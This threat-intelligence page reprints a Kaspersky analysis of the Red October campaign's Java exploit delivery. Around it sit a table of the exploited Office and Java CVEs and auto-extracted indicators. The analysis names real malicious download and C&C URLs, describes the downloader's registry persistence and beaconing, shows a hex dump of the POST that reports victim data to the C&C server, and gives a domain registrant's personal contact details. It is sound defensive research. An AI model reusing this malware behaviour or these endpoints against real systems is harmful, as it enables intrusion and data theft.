Red October
Vulnerabilities mentionedAll →
| CVE | Vulnerability | CVSS | EPSS | Flags | Affected | Exposure | Published |
|---|---|---|---|---|---|---|---|
| CVE-2009-3129 | CVE-2009-3129: Memory Corruption RCE in Microsoft Excel via FEATHEADER Record Microsoft Office Excel contains a memory corruption flaw in its parsing of the FEATHEADER record in spreadsheet files. An attacker triggers it by getting a user to open a crafted spreadsheet whose FEATHEADER record carries an invalid cbHdrData size value, which corrupts a pointer offset and allows execution of arbitrary code with the privileges of the logged-in user. Anyone running the affected Microsoft Excel versions is exposed, with the highest risk wherever users open spreadsheets arriving by email or from untrusted sources; the available data does not enumerate specific vulnerable versions. Exploitation is confirmed: CISA added the flaw to the Known Exploited Vulnerabilities catalog on 2022-03-03, EPSS assigns an 85.7% probability of exploitation within 30 days (100th percentile), and the related public reporting ties this Excel exploit to the first stage of the 'Red October' cyber espionage campaign uncovered by Kaspersky Lab. No public proof-of-concept is cataloged, and ransomware use is unknown. Do: Apply Microsoft's Office/Excel security updates per vendor instructions, as required by the CISA KEV catalog, and prioritize an audit for legacy or infrequently patched Office installations that may have missed the 2009 remediation. Until patched, treat unsolicited or externally sourced Excel spreadsheets as untrusted and block or carefully inspect them at email and web gateways. Note that this flaw is associated with espionage-style spearphishing delivery, so also hunt for spreadsheet-opening anomalies in user workstations. | — | 86% | KEV |
| masstens of millions of Microsoft Excel/Office users (Excel ships with Microsoft Office, whose installed base runs to hundreds of millions of desktops, including a… | |
| CVE-2010-3333 | Stack Buffer Overflow in Microsoft Office RTF Parsing Allows Remote Code Execution CVE-2010-3333 is a stack-based buffer overflow in the way Microsoft Office parses RTF (Rich Text Format) data. An attacker triggers it by convincing a user to open a specially crafted RTF file, including an RTF email that is handed to Office for rendering, with no authentication required beyond the user's action. Successful exploitation allows remote code execution in the context of the logged-on user, giving the attacker a foothold on the workstation. Any Microsoft Office installation within the affected range identified in the December 2012 Microsoft security bulletin is exposed; the source data does not enumerate specific version numbers. The flaw is actively exploited: it is on the CISA Known Exploited Vulnerabilities catalog (added 2022-03-03, ransomware association unknown) and was used in targeted espionage, notably Kaspersky's 'Red October' campaign, with EPSS estimating an 89.5% probability of exploitation within 30 days (100th percentile). Do: Apply the Microsoft updates from the December 2012 security bulletin that fixes this RTF parsing flaw across all Office/Word installations, prioritized given the ~90% EPSS score and CISA KEV listing. As interim mitigation, block or inspect inbound RTF attachments at email gateways and configure Outlook to read email in plain text so RTF content does not open automatically in Office. Inventory legacy or unpatched Office installations that may have missed the 2012 update, since these remain the likely current exposure. | — | 89% | KEV |
| masshundreds of millions of Office users/installations at time of disclosure (current unpatched legacy installs unknown) | |
| CVE-2011-3544 | Remote Code Execution in Oracle Java SE JRE Applet Rhino Script Engine CVE-2011-3544 is an access control flaw in the Rhino JavaScript Script Engine component used by Java applets in Oracle's Java Runtime Environment. It is triggered when a user's browser loads a malicious Java applet, allowing script executed through the Rhino engine to bypass Java's access restrictions. An attacker who successfully exploits it gains the ability to run arbitrary code on the victim's machine with the privileges of the logged-in user, typically via drive-by download from a compromised or attacker-controlled website. Any system with a vulnerable Oracle Java SE JDK or JRE and an enabled Java browser plugin is affected. Exploitation is confirmed in the wild: the flaw was added to CISA's KEV on 2022-03-03, carries a 96.7% EPSS probability of exploitation within 30 days, and contemporary reports show it weaponized in the BlackHole/Whitehole exploit kits and used in mass OS X exploitation. Do: Apply updated Oracle Java SE builds per Oracle's vendor instructions, prioritizing internet-facing and end-user systems listed in the KEV guidance. Where patching is delayed, disable the Java browser plugin or block Java applets at the web gateway, since the attack vector is malicious applets served over the web. Review endpoints for signs of exploit-kit drive-by compromise, especially legacy Windows and OS X machines with outdated Java. | — | 97% | KEV |
| masshundreds of millions of desktops and servers with a Java runtime installed; exact count unknown | |
| CVE-2012-0158 | Remote Code Execution in Microsoft MSCOMCTL.OCX (Windows Common Controls) CVE-2012-0158 is a remote code execution flaw in Microsoft's MSCOMCTL.OCX, the Windows Common Controls ActiveX component, where improper handling of crafted input allows memory corruption and code execution. It is typically triggered when an application that uses the control (most commonly Microsoft Office) processes specially crafted content, such as a malicious document or file, meaning a victim usually has to open attacker-supplied content. Successful exploitation lets an attacker run arbitrary code and take complete control of the affected system with the privileges of the current user. Any Windows system carrying a vulnerable copy of MSCOMCTL.OCX — including systems where the control was redistributed by legacy applications — is affected, which makes the potential population very large. Exploitation is confirmed and ongoing: the flaw is in CISA's Known Exploited Vulnerabilities catalog (added 2021-11-03) with known ransomware use, and EPSS assigns it the maximum reported probability of exploitation within 30 days. Do: Apply the Microsoft security update for MSCOMCTL.OCX (per vendor instructions, per CISA's required action) on all systems, prioritizing endpoints and servers that open Office documents. Because exploitation commonly arrives via malicious documents, treat unsolicited Office/RTF attachments with suspicion and verify that applications that redistribute MSCOMCTL.OCX have installed a patched copy. Scan the estate for the presence and version of MSCOMCTL.OCX, especially on legacy Windows/Office installations that may be missed by routine patching. | — | 100% | KEV ransomware |
| masshundreds of millions of Windows systems potentially affected |
Indicators of compromiseauto-extracted · verify before use · export allAll →
| Type | Indicator | Context |
|---|---|---|
| md5 | 35f1572eb7759cb7a66ca459c093e8a1 | o infiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 – ‘NewsFinder.jar’ ), known as the ‘Rhino’ exploit (CVE-201 |
| md5 | c3b0d1403ba35c3aba8f4529f43fb300 | n a public sandbox at malwr.com ( http://malwr.com/analysis/c3b0d1403ba35c3aba8f4529f43fb300/ ), and only on February 14th, the very same day that they |
| url | http://www.hotinfonews.com/news/dailynews2.php?id=&t=win” | hat is concatenated with the other variables, resulting in “hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win”. It is this content that is written to disk and executed on |
Full article1,439 words · extracted from securelist.com · click to collapse
Since the publication of our report, our colleagues from Seculert have discovered and posted a blog about the usage of another delivery vector in the Red October attacks (http://blog.seculert.com/2013/01/operation-red-october-java-angle.html).
In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers also infiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 – ‘NewsFinder.jar’), known as the ‘Rhino’ exploit (CVE-2011-3544).
We know the early February 2012 timeframe that they would have used this technique, and this exploit use is consistent with their approach in that it’s not 0-day. Most likely, a link to the site was emailed to potential victims, and the victim systems were running an outdated version of Java.
However, it seems that this vector was not heavily used by the group. When we downloaded the php responsible for serving the ‘.jar’ malcode archive, the line of code delivering the java exploit was commented out. Also, the related links, java, and the executable payload are proving difficult to track down to this point.
The domain involved in the attack is presented only once in a public sandbox at malwr.com (http://malwr.com/analysis/c3b0d1403ba35c3aba8f4529f43fb300/), and only on February 14th, the very same day that they registered the domain hotinfonews.com:
|
1 2 3 4 5 6 7 8 9 10 11 |
Domain Name:HOTINFONEWS.COM Registrant: Privat Person Denis Gozolov(gozolov@mail.ru) Narva mnt27 Tallinn Tallinn,10120 EE Tel.+372.54055298 Creation Date:14-Feb-2012 Expiration Date:14-Feb-2013 |
Following that quick public disclosure, related MD5s and links do not show up in public or private repositories, unlike the many other Red October components.
We could speculate that the group successfully delivered their malware payload to the appropriate target(s) for a few days, then didn’t need the effort any longer. Which may also tell us that this group, which meticulously adapted and developed their infiltration and collection toolset to their victims’ environment, had a need to shift to Java from their usual spearphishing techniques in early February 2012. And then they went back to their spear phishing.
Also of note, there was a log recording three separate victim systems behind an IP address in the US, each connecting with a governmental economic research institute in the Middle East.
So, this Java Rhino exploit appears to be of limited use. And, the functionality embedded on the server side PHP script that delivers this file is very different from the common and related functionality that we see in the backdoors used throughout the five year campaign.
The crypto routines maintained and delivered within the exploit itself are configured such that the key used to decrypt the URL strings within the exploit is delivered within the Java applet itself. Here is our PHP encryption routine to encrypt the Url for the downloader content:

And this is the function to embed the applet in the HTML, passing the encrypted URL string through parameter ‘p’:

Here is the code within the applet that consumes the encrypted strings and uses it. The resulting functionality downloads the file from the URL and writes it to ‘javaln.exe’. Notice that the strb and stra variables maintain the same strings as the $files and $charset variables in the php script:

This “transfer” decryption routine returns a URL that is concatenated with the other variables, resulting in “hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win”. It is this content that is written to disk and executed on the victim’s machine. A description of that downloader follows. It is most interesting that this exploit/php combination’s encryption routine is different from the obfuscation commonly used throughout Red October modules. It further suggests that potentially this limited use package was developed separately from the rest for a specific target.
2nd stage of the attack: EXE, downloader
The second stage of the attack is downloaded from “http://www.hotinfonews.com/news/dailynews2.php” and executed by the payload of the Java exploit. It acts as a downloader for the next stage of the attack.
Known file location: %TEMP%javaln.exe
MD5: c3b0d1403ba35c3aba8f4529f43fb300
The file is a PE EXE file, compiled with Microsoft Visual Studio 2008 on 2012.02.06. The file is protected by an obfuscation layer, the same as used in many Red October modules.

Obfuscation layer disassembled
The module creates a mutex named “MtxJavaUpdateSln” and exits if it already exists.
After that, it sleeps for 79 seconds and then creates one of the following registry values to be loaded automatically on startup:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
JavaUpdateSln=%full path to own executable%
[HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun]
JavaUpdateSln=%full path to own executable%
Then, after a 49 second delay, it enters an infinite loop waiting for a working Internet connection. Every 67 seconds it sends a HTTP POST request to the following sites:
- www.microsoft.com
- update.microsoft.com
- www.google.com
Once a valid connection is established, it continues to its main loop.
C&C server connection loop
Every 180 seconds the module sends a HTTP POST request to its C&C server.
The request is sent to a hardcoded URL: www.dailyinfonews.net/reportdatas.php
The contents of the post request follow the following format:
id=%unique user ID, retrieved from the overlay of the file%&
A=%integer, indicates whether the autorun registry key was written%&
B=%0 or 1, indicates if user has administrative rights%&
C=%integer, level of privilege assigned to the current user%
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
00000000504f535420687474703a2f2f7777772e|POST http://www.| 000000106461696c79696e666f6e6577732e6e65|dailyinfonews.ne| 00000020743a38302f7265706f72746461746173|t:80/reportdatas| 000000302e70687020485454502f312e300d0a48|.php HTTP/1.0..H| 000000406f73743a207777772e6461696c79696e|ost:www.dailyin| 00000050666f6e6577732e6e65743a38300d0a43|fonews.net:80..C| 000000606f6e74656e742d6c656e6774683a2036|ontent-length:6| 00000070320d0a436f6e74656e742d547970653a|2..Content-Type:| 00000080206170706c69636174696f6e2f782d77|application/x-w| 0000009077772d666f726d2d75726c656e636f64|ww-form-urlencod| 000000a065640d0a0d0a69643d41414139333935|ed....id=AAA9395| 000000b037353239353331323530353134303236|7529531250514026| 000000c031303036434343393333303039424242|1006CCC933009BBB| 000000d0313635343135313326413d3126423d31|16541513&A=1&B=1| 000000e026433d32|&C=2| |
HTTP POST request sent to the C&C server
The module decrypts the C&C response with AMPRNG algorithm using a hardcoded key. Then, it checks if there is a valid EXE signature (“MZ”) at offset 37 in the decrypted buffer. If the signature is present, it writes the EXE file to “%TEMP%nvsvc%p%p.exe” (%p depends on system time) and executes it.
3rd stage of the attack: EXE, unknown
Currently, the C&C server is unavailable and we do not have the executables that were served to the “javaln.exe” downloader. Most likely, they were the actual droppers, similar to the ones used with Word and Excel exploits.
Conclusions
As more information about the Red October becomes available and third parties are publishing their own research into the attacks, it becomes clear that the scope of the operation is bigger than originally thought.
In addition to the Java exploit presented here, it’s possible that other delivery mechanisms were used during the 5 years since this gang was active. For instance, we haven’t seen any PDF exploits yet, which are very popular with other groups – an unusual thing.
We will continue to monitor the situation and publish updates as the story uncovers.
Text extracted automatically; images, tables and formatting may be missing. Original: https://securelist.com/red-october-java-exploit-delivery-vector-analysis/35017/